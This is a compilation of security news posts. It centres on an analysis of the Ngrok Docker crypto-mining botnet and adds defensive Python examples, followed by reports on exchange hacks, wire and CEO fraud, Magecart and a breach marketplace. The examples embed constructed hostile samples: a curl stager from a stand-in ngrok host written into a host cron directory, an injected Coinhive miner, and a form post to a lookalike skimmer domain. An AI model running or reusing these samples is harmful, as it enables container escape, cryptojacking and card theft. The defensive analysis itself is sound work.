Specifically, it demonstrates a novel, dynamic and robust operational security model and the ability to detect and attack newly deployed and misconfigured infrastructure.

Additionally, the campaign is sophisticated in seeking to detect, analyse and neutralise other competing crypto-mining malware. Its agile process can be flexed to quickly deal with new entrant-attacks and ensure a full share of the victim’s CPU resources for its activities.

Introduction

In my previous post I discussed the initial prototyping of a Docker Honeypot / Sandbox called Whaler. I’ve now been running this for a few months and tracking the number of campaigns with a range of sophistication. The most sophisticated of these was the first attack observed within hours of the initial deployment. I named the campaign Ngrok after the inventive reverse proxy used to hide the C2 infrastructure.

I’ve been following the Monero mining pool address used in the Ngrok campaign and regularly checking for other research references on the internet. The campaign has gone largely unnoticed until a recent blog published by 360totalsecurity which prompted me to finally write-up the analysis. As of today (20 Sept) the campaign is still active.

Note: I’d previously documented this as a presentation which I’ve been using in job interviews – key slides are extracted and covered below.

Summary of observed attacks

Whaler – attack types and analysis

Before getting into the details of the Ngrok campaign, it's worth summarising the key findings from the first few months of operations and development. Firstly, nearly all attacks observed were crypto-mining attacks. One exception appeared to attempt to stage a meterpreter payload to the server, but I was unable to follow up in time on this and the attacker did not repeat the attack.

Most attackers seem to rely on discovery and indexing by Shodan as a source for their target list. There’s a clear correlation between the honeypot first appearing on Shodan and an immediate wave of attacks.

The attacks broadly fall into three levels of sophistication:

  • Low Complexity – Simply pulling a pre-baked mining image from Docker Hub and running it with parameterisation for the attacker's mining pool / account
  • Medium Complexity – Again using Docker Hub, but creating their own container images, often with misleading names (e.g. mysql) but essentially containing a fully configured crypto-miner. Several of these were reported and shut down quickly working with the Docker security team. Other malware, such as an IRC botnet, was also observed bundled with the miner software.
  • High Complexity – These attackers either ran their own target scanning operations, or leveraged their botnets to do this work for them. They were therefore able to detect and attack victims much quicker. Some of these attacks used the volume mounting feature of the Docker Daemon to execute a container escape – and therefore could install their payloads on the “host” system – invisible to Docker and any monitoring of running containers.

First Attack

Attack timing for Ngrok campaign

The first attack was observed within a few hours of deploying the initial Whaler prototype. The attack was occurring approximately every 2 hours in a continuous cycle – which indicates the attack is automated.

Pcap analysis of Ngrok attack

The user agent string confirms this is likely automated, and the attacker is using an open source lightweight Ruby based docker API client framework from Swipely.

The attacking IP address is consistently hidden behind a VPN service.

Exploit

Whaler “Fingerprint” for Ngrok attack

Whaler was enhanced to provide a “fingerprint” of each attack. This is used to determine how much of the attack data (Docker images, containers, pcap files etc) to retain, based on the probability this attack has already been seen. Automated attacks can drive a large amount of data storage requirements if this isn’t managed carefully!

The attack fingerprint for Ngrok is shown above. Key features are:

  • The attacker uses a public alpine docker image, pre-installed with curl. There is nothing malicious about this publicly available container
  • The container is parameterised to use curl to download and run a staging script from an ngrok reverse proxy address – i.e. hiding the backend C2 infrastructure
  • Note: The ngrok.io subdomains are rotated through a set of 52 which are replaced every 8 hours
  • Each victim has a unique hash identifier to identify their IP – this is used for reporting back to the C2 on details of the host and infection status
  • The container mounts the root file system of the host and creates a crontab entry to execute the stager script outside of docker – this is a classic docker container escape
  • There is a parameter to identify that the stager for Docker (d) should be downloaded – the attacker has a broader target scope including other misconfigured products as discussed later
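The fingerprinting idea above is easy to reproduce on the defender's side. The following Python is an added example written for this page, not Whaler's own code and not from the original post: it takes Docker Engine container-create request bodies of the shape a honeypot logs (the real API fields Image, Cmd and HostConfig.Binds), masks the parts this campaign rotates (the ngrok.io subdomain and the per-victim identifier) so that repeated automated runs collapse to one fingerprint, and flags the risky features the text describes (host root mount, cron persistence, ngrok C2, remote download). The three sample requests are constructed for the example; the hostnames, paths and identifiers in them are invented.

```python
import hashlib
import json
import re

# Constructed samples: two requests from the campaign pattern described above,
# differing only in the rotating ngrok subdomain and the victim id, plus one
# benign request so the flags have a negative case.
SAMPLE_REQUESTS = [
    json.dumps({
        "Image": "alpine/curl",
        "Cmd": ["sh", "-c",
                "curl -fsSL http://1a2b3c4d.ngrok.io/s?t=d&id=9f86d081 "
                "-o /mnt/etc/cron.d/x"],
        "HostConfig": {"Binds": ["/:/mnt"]},
    }),
    json.dumps({
        "Image": "alpine/curl",
        "Cmd": ["sh", "-c",
                "curl -fsSL http://5e6f7a8b.ngrok.io/s?t=d&id=0ab1c2d3 "
                "-o /mnt/etc/cron.d/x"],
        "HostConfig": {"Binds": ["/:/mnt"]},
    }),
    json.dumps({
        "Image": "nginx:1.15",
        "Cmd": None,
        "HostConfig": {"Binds": ["webdata:/usr/share/nginx/html"]},
    }),
]

NGROK_RE = re.compile(r"https?://[a-z0-9-]+\.ngrok\.io", re.I)
VICTIM_ID_RE = re.compile(r"\bid=[0-9a-f]{8,}", re.I)


def normalise(text):
    """Mask the parts the attacker rotates so repeated runs collide."""
    text = NGROK_RE.sub("http://<ngrok>.ngrok.io", text)
    return VICTIM_ID_RE.sub("id=<victim>", text)


def fingerprint(request_json):
    """Stable short hash of image + normalised command + sorted bind mounts."""
    req = json.loads(request_json)
    image = req.get("Image", "")
    cmd = " ".join(req.get("Cmd") or [])
    binds = sorted((req.get("HostConfig") or {}).get("Binds") or [])
    stable = "|".join([image, normalise(cmd), ",".join(binds)])
    return hashlib.sha256(stable.encode()).hexdigest()[:16]


def risk_flags(request_json):
    """Name the container-escape and C2 features seen in this request."""
    req = json.loads(request_json)
    flags = []
    for bind in (req.get("HostConfig") or {}).get("Binds") or []:
        if bind.split(":")[0] == "/":          # host root mounted into container
            flags.append("host-root-mount")
    cmd = " ".join(req.get("Cmd") or [])
    if "/etc/cron" in cmd or "crontab" in cmd:
        flags.append("cron-persistence")
    if NGROK_RE.search(cmd):
        flags.append("ngrok-c2")
    if re.search(r"\b(curl|wget)\b", cmd):
        flags.append("remote-download")
    return flags


def triage(requests, seen=None):
    """Return (fingerprint, flags, is_new) per request; 'seen' drives retention."""
    seen = set() if seen is None else seen
    results = []
    for request_json in requests:
        fp = fingerprint(request_json)
        results.append((fp, risk_flags(request_json), fp not in seen))
        seen.add(fp)
    return results


if __name__ == "__main__":
    for fp, flags, is_new in triage(SAMPLE_REQUESTS):
        print(fp, "NEW " if is_new else "seen", flags)
```

Only requests whose fingerprint is new need their images, containers and pcaps kept in full; repeats can be reduced to a counter and timestamp, which is what keeps storage under control when the same automated attack arrives every couple of hours.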

Stage 1 – Loader

The loader script, once running on the host system (outside of Docker), performs the following actions.

  • Enumerate all processes and immediately kill any that meet a pre-defined kill list (other mining processes)
  • Install the miner for the attacker by downloading two further binaries
  • Report back to the C2 server (via ngrok) on the following:
    • Process ID of the infection by this attack
    • Number of CPUs
    • Current Username
    • Process name, binary location and MD5 sum of binary of anything currently running above 20% CPU

The last data point reported here enables the attacker to identify new mining campaigns and adjust their script to also target termination of those processes where found.

During the course of the analysis it was also noted that additional code was added to search for and inject Coinhive mining code into any javascript files found on the server. If these are then served via a web server it would result in further browser-based mining on behalf of the attacker.
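Because the injection happens to static files that a web server then hands to every visitor, the practical defence is file-integrity monitoring of the web root combined with a check for known browser-miner loaders. The Python below is an added example for this page, not code from the original analysis: it hashes every .js file under a root, reports files whose hash has moved since the baseline, and looks in those files for the loader names the public Coinhive miner used (coinhive.min.js and CoinHive.Anonymous). The demo() function builds a constructed web root in a temporary directory and tampers with one file; the injected snippet and the site key placeholder are invented for the example.

```python
import hashlib
import os
import re
import tempfile

# Indicator names -> patterns for the public Coinhive browser miner loader.
# A hit means "inspect this file", not a confirmed infection.
MINER_INDICATORS = {
    "coinhive-loader": re.compile(r"coinhive\.min\.js", re.I),
    "coinhive-anonymous-miner": re.compile(r"CoinHive\.Anonymous", re.I),
}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root):
    """Map relative path -> sha256 for every .js file under root.

    Store the result off-host: a stager running as root on the web server
    could otherwise rewrite the baseline along with the files."""
    result = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".js"):
                full = os.path.join(dirpath, name)
                result[os.path.relpath(full, root)] = sha256_file(full)
    return result


def changed_files(root, base):
    """Files whose hash differs from the baseline, including newly added ones."""
    current = baseline(root)
    return sorted(p for p in current if base.get(p) != current[p])


def miner_hits(path):
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    return [name for name, rx in MINER_INDICATORS.items() if rx.search(text)]


def scan(root, base):
    """Return {relpath: [indicator names]} for every file that changed."""
    return {p: miner_hits(os.path.join(root, p)) for p in changed_files(root, base)}


def demo():
    """Constructed web root: take a baseline, tamper with one file, rescan."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "app.js"), "w") as f:
            f.write("console.log('hello');\n")
        os.mkdir(os.path.join(root, "vendor"))
        with open(os.path.join(root, "vendor", "lib.js"), "w") as f:
            f.write("export const x = 1;\n")
        base = baseline(root)
        # Constructed injection modelled on the behaviour described above;
        # the site key is a placeholder.
        with open(os.path.join(root, "app.js"), "a") as f:
            f.write("var s=document.createElement('script');"
                    "s.src='https://coinhive.com/lib/coinhive.min.js';"
                    "document.head.appendChild(s);"
                    "var m=new CoinHive.Anonymous('SITEKEY_PLACEHOLDER');m.start();\n")
        return scan(root, base)


if __name__ == "__main__":
    print(demo())
```

An unchanged file is never opened for indicator matching, so the indicator list can be extended freely without the scan cost growing with the size of the web root; a changed file with no indicator hit is still worth a look, since the same persistence gives the attacker a way to inject anything else.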

Stage 2 – Scanner

Once the installation has been successfully completed and the infection has been reported back to the C2 infrastructure, a second script is delivered using the same mechanism as before (container escape -> cron job).

This second stage is used to enlist the victim to mass-scan a large section of IPv4 space looking for further victims. The script downloads Zmap, Zgrab and JQ and performs a scan of a pre-defined series of 8K blocks of the internet looking for:

  • Redis on port 6379
  • Docker on port 2375
  • Jenkins, Drupal and Modx on ports 80 and 8080
  • CouchDB on 5984
  • Ethereum on 8545

Results are reported back to the C2, and hence the cycle repeats.
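The port list above doubles as a self-check for anyone running these products: a host is only interesting to this scanner if one of those services listens on every interface rather than on loopback or a private address. The Python below is an added example for this page, not part of the original write-up: it parses the output format of `ss -ltn` and reports which of the campaign's target ports are bound to all interfaces. The ss output it uses is constructed for the example (a host exposing the plaintext Docker API, CouchDB and port 8080 while keeping Redis on loopback); in practice you would feed it the live command's output.

```python
import re

# Services the Stage 2 scanner looks for, taken from the list above.
TARGETED_PORTS = {
    6379: "Redis",
    2375: "Docker API (plaintext)",
    80: "HTTP (Jenkins/Drupal/Modx)",
    8080: "HTTP-alt (Jenkins/Drupal/Modx)",
    5984: "CouchDB",
    8545: "Ethereum JSON-RPC",
}

# Constructed `ss -ltn` output for the example host.
SAMPLE_SS_OUTPUT = """State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:22            0.0.0.0:*
LISTEN  0       128     127.0.0.1:6379        0.0.0.0:*
LISTEN  0       4096    *:2375                *:*
LISTEN  0       511     0.0.0.0:8080          0.0.0.0:*
LISTEN  0       128     [::]:5984             [::]:*
"""

# State, Recv-Q, Send-Q, then "address:port"; the address may be IPv4, "*" or "[::]".
LINE_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+")


def parse_listeners(ss_output):
    """Yield (local_address, port) for every LISTEN line."""
    for line in ss_output.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), int(m.group(2))


def is_all_interfaces(addr):
    """True for the wildcard binds ss prints for IPv4 and IPv6."""
    return addr in ("0.0.0.0", "*", "[::]", "::")


def exposed_services(ss_output):
    """Sorted (port, service) pairs that are on the scanner's list and reachable
    from any interface. Loopback-only services and untargeted ports are ignored."""
    hits = set()
    for addr, port in parse_listeners(ss_output):
        if port in TARGETED_PORTS and is_all_interfaces(addr):
            hits.add((port, TARGETED_PORTS[port]))
    return sorted(hits)


if __name__ == "__main__":
    for port, name in exposed_services(SAMPLE_SS_OUTPUT):
        print(f"{port}\t{name}")
```

Port 2375 is the one to treat as an incident rather than a finding: the Docker API on that port is unauthenticated, and, as the fingerprint section shows, a bind mount of the host root is all an automated client needs to leave the container.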

Overview of Attacker Infrastructure

An overview of the Ngrok infrastructure is shown above.

Hash Rate & Payment History

Ngrok account hash rate over time

The deployed miner was configured to use the minexmr pool, and the wallet id used is:

4AuKPF4vUMcZZywWdrixuAZxaRFt9FPNgcv9v8vBnCtcPkHPxuGqacfPrLeAQWKZpNGTJzxKuKgTCa6LghSCDrEyJ5s7dnW

Using this we can see that this account was first used in early April, with an approximate hashing capacity of 30-40k/s, and that there was a significant increase in capacity in early June, peaking at 90k/s. This uplift correlates with 360totalsecurity's observation that the attacks “started in June” – perhaps indicating an additional target infrastructure that triggered their honeypots.

For reference, benchmarking the miner on a 1 CPU cloud server, the peak mining capacity here would be in the region of 2000 virtual CPUs.

Ngrok cumulative profit

The campaign has produced a steady, but relatively low, stream of income. It is possible that other accounts are used – in fact we also have the Coinhive account, for which we are unable to determine the hashing rate or any payment details.

Between April and late August the attackers had made approximately £5,000 GBP.

Further details including IoC are available at the following URL:

Ngrok Mining Botnet

About the author: oncyberblog.wordpress.com staff

Pierluigi Paganini

(Security Affairs – Ngrok, malware)

The post Ngrok Mining Botnet appeared first on Security Affairs.


Hackers steal $60 million from Japan’s Zaif cryptocurrency exchange

By Waqas

Zaif is the 35th largest cryptocurrency exchange by turnover. Hackers have stolen a whopping $60 million (6.7 billion yen) worth of cryptocurrency from Zaif, the 35th largest cryptocurrency exchange dealing in Bitcoin, Bitcoin Cash, and Monacoin. The exchange is owned by Tech Bureau, Corp. based in Nishi-Ku, Osaka, Japan. The hack attack took place on September 14th after hackers gained […]

This is a post from HackRead.com Read the original post: Hackers steal $60 million from Japan’s Zaif cryptocurrency exchange

Homebuyers Being Targeted by Money Transfer Scam

Money Transfer Scam – Scammers hack the victims' email accounts, monitor conversations between the buyers and title agents, and send instructions on where to wire the money.

A new homebuyer moves through a period of vulnerable transition as they invest in their future. This sensitive stage — a confusing flurry of representatives, documentation and planning — represents an attractive target for con artists with ill intentions. Some choose to capitalize on homebuyers’ ignorance.

The con in question is a money transfer scam with all the likeness of a typical transaction. Scammers hack the email accounts of their victims and monitor conversations between the buyers and title agents. Toward the close of the interaction, the scammers will send false instructions on where to wire the money.

After the wrongfully transferred money reaches the criminals behind the money transfer scam, they disappear, thousands of dollars wealthier. The practice is so whisper-quiet and challenging to catch that it’s given the FBI considerable trouble. For all intents and purposes, the scammers appear real.

Bryan O’Meara was hoping to expand his business with the addition of a parking lot for his new restaurant. He intended to wire upward of $1 million to the seller of the property but was unaware that his conversations were under surveillance by scammers. His business partner was equally unaware.

Fortunately for O’Meara, he didn’t follow through with the transaction — a decision that saved him an enormous sum of money. A loss of that caliber might have upended his business, and it’s a risk that many moving forward in real estate transactions should consider.

Image by Soumil Kumar

FBI Involvement

The Federal Bureau of Investigation has offered the American public advice on how to better safeguard their money from scammers and hackers. After reporting $5 million in loss from Utah residents in 2017, every citizen is encouraged to take preventive measures to protect themselves from scams.

These measures include a frequent change in passwords, using mismatched and uncommon characters to avoid predictability. They also include a final follow-up with your partner or agent to confirm the wiring instructions are correct. Finally, in a worst-case scenario, people should contact their bank for immediate recall.

It’s an unfortunate truth that, even in the event of a recall, the victim loses most of their stolen money. Scammers will often bounce-wire the money through several international accounts at a high pace, blurring the trail that’s left behind in the event their target tries to reverse their transaction.

No security is 100 percent reliable. Even in following all the steps and taking every precaution, scammers and hackers will always innovate new techniques to steal money from their unwitting victims.

Protecting Home Purchases

While the FBI is a helpful resource when combating scammers, homebuyers are encouraged to take additional measures before they purchase their property of interest. For many, changing a password and making a phone call will not be enough. They should also consider the following advice.

In the final stages of communication between an individual and a company, a comparison of early emails and those received later can reveal differences. These differences indicate a scammer has entered the conversation under the guise of a professional. Verification through multiple channels is the safest route.

A scammer will also place a high amount of pressure on a homebuyer to wire their money. Homebuyers in the final stages of transfer are advised to look closely at the information exchanged between them and the vendor to ensure its validity. A lax attitude toward detail can leave a person open to attack.

However, these innocent people don’t have to fall into the same old traps. Everyone should commit themselves to an awareness of common scamming techniques and illegal practices. Before purchasing a home, potential buyers would benefit by educating themselves about the latest scams in circulation by criminals.

Assessing the Danger

According to a 2017 report by the FBI, almost $1 billion was diverted or nearly diverted from real estate transactions — up by a significant margin from the year prior. This enormous sum of money speaks to the severity of the problem and its relevance to homebuyers today.

As they work through the final stages of a real estate transaction, buyers must remain diligent. A lack of interest in the proceedings can spell the difference between money lost and money saved. With a transaction as important as property exchange, anything less than total attention is inviting trouble.

It’s only through awareness and caution that citizens can protect themselves and their loved ones from the dangers of fraudulent activity.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(Security Affairs – Money Transfer Scam, cybercrime)

The post Homebuyers Being Targeted by Money Transfer Scam appeared first on Security Affairs.

CEO fraud: call it what you want, but I call it messing with the quids

A ruse by any other name, invoice redirection scams are a huge and growing business problem. They’re also known as fake boss scams, impersonation fraud, CEO fraud, or business email compromise, and they’ve risen by 58 per cent in the past year. That’s according to Lloyds Bank which estimates that UK SMEs lose £27,000 on average to such scams. The bank says this type of fraud affects up to half a million businesses.

Here’s how it works: criminals write an email supposedly from a company CEO or CFO, and send it to an employee requesting an urgent payment. Then the unwitting worker transfers the cash to an unauthorised account belonging to the criminals.

You know my name

Despite the name ‘CEO fraud’, bosses are rarely at risk from these scams. Barracuda Networks recently analysed 3,000 scam messages from its Sentinel system and found just 2 per cent target CEOs. Their names are more likely to appear on the emails that scammers send to other employees. Most of these messages land in the inboxes of staff in sales, accounts, operations or marketing departments. To avoid email filters, 60 per cent of messages don’t include links.

Criminals’ efforts are relentless: Valimail estimates that there are 6.4 billion fake emails in circulation every day. Help Net Security said this shows the scam isn’t just a social engineering problem. Because email has no built-in authentication mechanism, it’s easy for criminals to spoof senders.

Stop making cents

Fortunately, there are resources to help recognise these scams and prevent them from working. This month’s SANS Ouch! Newsletter includes tips on spotting and stopping BEC fraud. Lloyds released an awareness video to go with its survey as part of an awareness raising campaign with Get Safe Online. The short film portrays lookalike CEOs, showing how easy it is to appear to be someone else. We’ve also blogged about CEO fraud before and how to avoid becoming a victim. For example, making payment processes more rigorous can reduce the chances of the scam working.

To end on a positive note: the crime doesn't always pay. Irish police raided 15 homes around Ireland in September as part of a major fraud investigation. They had been tracking a gang they believed were laundering €14.6 million in proceeds from scams like invoice redirection. The crackdown shows why it's important for victims to report these crimes to police. “While your individual experience as a victim of cyber-crime may not lead directly to an arrest it is invaluable to law enforcement as a source of intel,” said BH Consulting CEO Brian Honan.

The post CEO fraud: call it what you want, but I call it messing with the quids appeared first on BH Consulting.

Security Affairs: Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange

Cybercriminals have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from the Japanese digital currency exchange Zaif exchange.

According to the Tech Bureau Corp., a Japanese cryptocurrency firm, hackers have compromised its Zaif exchange and have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies, including Bitcoin, Monacoin, and Bitcoin Cash.

The stolen digital currencies included roughly 2.2 billion yen belonging to Tech Bureau and 4.5 billion belonging to its clients.

The hackers took control of the exchange for a couple of hours on Sept. 14 and illegally transferred coins from the “hot wallet” of the exchange to wallets under their control.

“Japanese cryptocurrency firm Tech Bureau Corp said about $60 million in digital currencies were stolen from its exchange, highlighting the industry's vulnerability despite recent efforts by authorities to make it more secure.” reported Reuters.

Three days later, operators at the exchange noticed server problems and publicly disclosed the hack on Sept. 18.

Tech Bureau took the exchange offline and sold majority ownership to Fisco Ltd for a 5 billion yen ($44.59 million) investment that would be used to replace the digital currencies stolen from client accounts.

“Documents seen by Reuters on Thursday showed Japan's Financial Services Agency would conduct emergency checks on cryptocurrency exchange operators' management of customer assets, following the theft. FSA officials were not immediately available for comment.” continues Reuters.

This is the second hack suffered by a Japanese crypto exchange this year; in January, the Japan-based digital exchange Coincheck was hacked and crooks stole $530 million in digital coins.

Earlier this year, a problem at the Zaif exchange allowed some people to buy cryptocurrencies without paying.

Japan is considered a global leader in cryptocurrency technologies; Bitcoin has been usable for payment in the country since April 2017, and major retailers accept this kind of payment.

Experts believe that the cyber heist will affect the FSA's ongoing regulatory review of the cryptocurrency industry.

Last year Japan became the first country to regulate cryptocurrency exchanges, which have to register with the FSA and meet reporting and other obligations.

In any case, these incidents demonstrate that the level of security of exchanges has to be improved.

Pierluigi Paganini

(Security Affairs – Zaif exchange, hacking)

The post Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange appeared first on Security Affairs.

Hackers behind Mirai botnet to avoid jail for working with the FBI

By Waqas

Mirai has been known as one of the most powerful botnets comprised of millions of hacked Internet of Things (IoT) devices including routers, digital video recorders (DVRs) and security cameras. Mirai was also used by hackers to carry out one of the largest DDoS attacks on the servers of DynDNS which ultimately disrupted high profile websites like […]

This is a post from HackRead.com Read the original post: Hackers behind Mirai botnet to avoid jail for working with the FBI

Security Affairs: US State Department confirms data breach to unclassified email system

The US State Department confirmed that hackers breached one of its email systems, the attack potentially exposed personal information of some of its employees.

The incident seems to have affected less than 1% of employee inboxes, 600-700 employees out of 69,000 people.

“The Department recently detected activity of concern in its unclassified email system, affecting less than 1 per cent of employee inboxes. Like any large organization with a global presence, we know the Department is a constant target for cyber attacks,” states the US State Department.

“We have not detected activity of concern in the Department’s classified email system. We determined that certain employees’ personally identifiable information (PII) may have been exposed. We have already notified those employees.”

The security breach affected an unclassified email system at the State Department, the news of the hack came to light after Politico obtained a “Sensitive but Unclassified” notice about the incident.

“This is an ongoing investigation, and we are working with partner agencies, as well as the private sector service provider, to conduct a full assessment.” a State Department spokesperson told Politico.

“We will reach out to any additional impacted employees as needed.”

After the Agency noticed the “suspicious activity” in its email system, it notified a number of employees whose personal information may have been compromised.

The US State Department didn't reveal which kind of data had been accessed by the attackers; at the time of writing we only know that no classified information had been exposed.

The Agency claimed it took steps to secure its system, and it is offering three years of credit and identity theft monitoring to the affected employees.

A group of senators wrote to Secretary of State Mike Pompeo last week raising concerns that the department did not meet federal standards for cybersecurity and questioning its resilience to cyber attacks.

“Sens. Ron Wyden (D-Ore.), Rand Paul (R-Ky.), Ed Markey (D-Mass.), Jeanne Shaheen (D-N.H.) and Cory Gardner (R-Colo.) asked Pompeo for an update on what the State Department has done to address its “high risk” designation, and how many cyberattacks the department had been subject to abroad in the last three years.” reported TheHill.

“Pompeo was asked to respond by Oct. 12.”

Pierluigi Paganini

(Security Affairs – US State Department, Data Breach)

The post US State Department confirms data breach to unclassified email system appeared first on Security Affairs.

Magecart cybercrime group stole customers’ credit cards from Newegg electronics retailer

Magecart hackers have stolen customers’ credit card data from the computer hardware and consumer electronics retailer Newegg.

The Magecart cybercrime group is back, this time the hackers have stolen customers’ credit card data from the computer hardware and consumer electronics retailer Newegg.

Magecart has been active since at least 2015; recently the group hacked the websites of Ticketmaster, British Airways, and Feedify to inject a skimmer script used to siphon users' payment card data.

The group behind the Ticketmaster and British Airways data breaches has now victimized the popular computer hardware and consumer electronics retailer Newegg.

The security firms Volexity and RiskIQ have conducted a joint investigation on the hack.

“Volexity was able to verify the presence of malicious JavaScript code limited to a page on secure.newegg.com presented during the checkout process at Newegg. The malicious code specifically appeared once when moving to the Billing Information page while checking out.” reported Volexity.

“This page, located at the URL https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx, would collect form data, siphoning it back to the attackers over SSL/TLS via the domain neweggstats.com.”

The Magecart group compromised the Newegg website and stole the credit card details of all customers who made purchases between August 14 and September 18, 2018.

“On August 13th Magecart operators registered a domain called neweggstats.com with the intent of blending in with Newegg’s primary domain, newegg.com.  Registered through Namecheap, the malicious domain initially pointed to a standard parking host.” reads the analysis published by RiskIQ.

“However, the actors changed it to 217.23.4.11 a day later, a Magecart drop server where their skimmer backend runs to receive skimmed credit card information. Similar to the British Airways attack, these actors acquired a certificate issued for the domain by Comodo to lend an air of legitimacy to their page.”

NewEgg timeline

Active since at least 2015, the Magecart hacking group registered a domain called neweggstats(dot)com (similar to Newegg’s legitimate domain newegg.com) on August 13 and acquired an SSL certificate issued for the domain by Comodo.

The technique is exactly the one employed for the attack against the British Airways website.

On August 14, the group injected the skimmer code into the payment processing page of the official retailer website, so that when customers made a payment the attackers were able to capture their payment data and send it to the domain neweggstats(dot)com they had set up.

“The skimmer code is recognizable from the British Airways incident, with the same basecode. All the attackers changed is the name of the form it needs to serialize to obtain payment information and the server to send it to, this time themed with Newegg instead of British Airways.” continues RiskIQ.

“In the case of Newegg, the skimmer was smaller because it only had to serialize one form and therefore condensed down to a tidy 15 lines of script.”

Experts noticed that the users of both desktop and mobile applications were affected by the hack.

Customers that made purchases on the Newegg website between August 14 and September 18, 2018, should immediately block their payment card.
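The defensive lesson from the Volexity and RiskIQ findings is that a checkout page should only reference hosts the merchant controls, and a lookalike such as a brand-named domain the merchant never registered is the tell. The following Python script is an added example, not code from Volexity, RiskIQ or Newegg: it parses a constructed copy of a checkout page, collects every host named by a `<script src>` or by a URL inside an inline script, and reports hosts outside an allowlist, marking the ones that embed the brand name as lookalikes. The sample HTML, the brand name `example-shop`, the allowlist and the function names are all assumptions for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page for illustration (not Newegg's real markup).
# The inline script mirrors the pattern RiskIQ describes: serialize the
# checkout form and post it to a lookalike domain. Only the destination
# matters for this check; the skimmer logic itself is not reproduced.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://secure.example-shop.com/js/checkout.js"></script>
<script src="https://cdn.example-shop.com/js/vendor.js"></script>
</head><body>
<form id="checkout"></form>
<script>
  window.addEventListener("load", function () {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://example-shopstats.com/GlobalData/", true);
  });
</script>
</body></html>
"""

# Assumed merchant brand and the hosts its checkout page is allowed to reference.
BRAND = "example-shop"
ALLOWED_DOMAINS = {"secure.example-shop.com", "cdn.example-shop.com"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collects external <script src> values and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def referenced_domains(html):
    """Every host named by a script tag or by a URL inside an inline script."""
    parser = ScriptCollector()
    parser.feed(html)
    domains = set()
    for src in parser.srcs:
        host = urlparse(src).hostname
        if host:
            domains.add(host.lower())
    for body in parser.inline:
        for host in URL_RE.findall(body):
            domains.add(host.lower())
    return domains


def is_lookalike(domain, brand):
    """A host that embeds the brand name but is not under the brand's own domain."""
    return brand in domain and not domain.endswith("." + brand + ".com") \
        and domain != brand + ".com"


def audit_checkout_page(html, brand=BRAND, allowed=ALLOWED_DOMAINS):
    """Return (domain, kind) pairs for every host not on the allowlist;
    kind is 'lookalike' for brand-impersonating hosts, else 'unexpected'."""
    findings = []
    for domain in sorted(referenced_domains(html)):
        if domain in allowed:
            continue
        kind = "lookalike" if is_lookalike(domain, brand) else "unexpected"
        findings.append((domain, kind))
    return findings


if __name__ == "__main__":
    for domain, kind in audit_checkout_page(SAMPLE_CHECKOUT_HTML):
        print(f"{kind:10s} {domain}")
```

Run against the constructed page, the audit reports `example-shopstats.com` as a lookalike while the two allowed hosts pass. The same allowlist maps directly onto a `Content-Security-Policy` header with `script-src` and `connect-src` directives, which makes the browser refuse the exfiltration request outright instead of only surfacing it in an after-the-fact scan.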

Pierluigi Paganini

(Security Affairs – skimmer script, hacking)

The post Magecart cybercrime group stole customers’ credit cards from Newegg electronics retailer appeared first on Security Affairs.


Hackers target Newegg with “sophisticated malware”; steal credit card data

By Waqas

At the moment, it is unclear how many Newegg customers have been impacted. The IT security researchers at RiskIQ and Volexity have announced that Newegg Inc., an online retailer of items including computer hardware and consumer electronics has become a victim of a cyber attack in which hackers have stolen credit card details of its customers. According to […]

This is a post from HackRead.com Read the original post: Hackers target Newegg with “sophisticated malware”; steal credit card data

Security Affairs: Access to over 3,000 compromised sites sold on Russian black marketplace MagBo

Security experts at Flashpoint discovered that access to over 3,000 compromised sites is being sold on the Russian black marketplace MagBo.

A new report published by researchers at Flashpoint reveals that access to over 3,000 breached websites is being offered on an underground hacking forum for Russian-speaking users.

“Access to approximately 3,000 breached websites has been discovered for sale on a Russian-speaking underground marketplace called MagBo. Access to some of the sites is selling for as low as 50 cents (USD).” reads the report published by Flashpoint.

The earliest advertisements for the MagBo black marketplace were posted in March to a top-tier Russian-language hacking and malware forum. According to the advertising, sellers are offering access to breached websites in several forms: PHP shell access, hosting control access, domain control access, File Transfer Protocol (FTP) access, Secure Shell (SSH) access, admin panel access, and database or Structured Query Language (SQL) access.

Most of the compromised websites are e-commerce sites, but crooks also offered access to websites of organizations in healthcare, legal, education and insurance industries and belonging to government agencies.

According to the experts, most of the compromised servers are hosted by U.S., Russian, or German hosting services. The company reported its findings to law enforcement, which is notifying the victims.

Experts found a dozen vendors on the MagBo black marketplace and hundreds of buyers participating in auctions to gain access to breached sites, databases, and administrator panels.

Access to compromised websites is a valuable commodity in the cybercrime underground; crooks can use it to carry out a broad range of illicit activities.

“Illicit access to compromised or backdoored sites and databases is used by criminals for a number of activities, ranging from spam campaigns, to fraud, or cryptocurrency mining.” continues the report.

“These compromises have also been used to gain access to corporate networks. This could potentially allow actors to access proprietary internal documents or resources, as well as entry points through which they can drop various malicious payloads. The types of vulnerabilities present and the ways in which they can be exploited depend on the threat actor’s specific capability, motivation, targeting, and goals.”

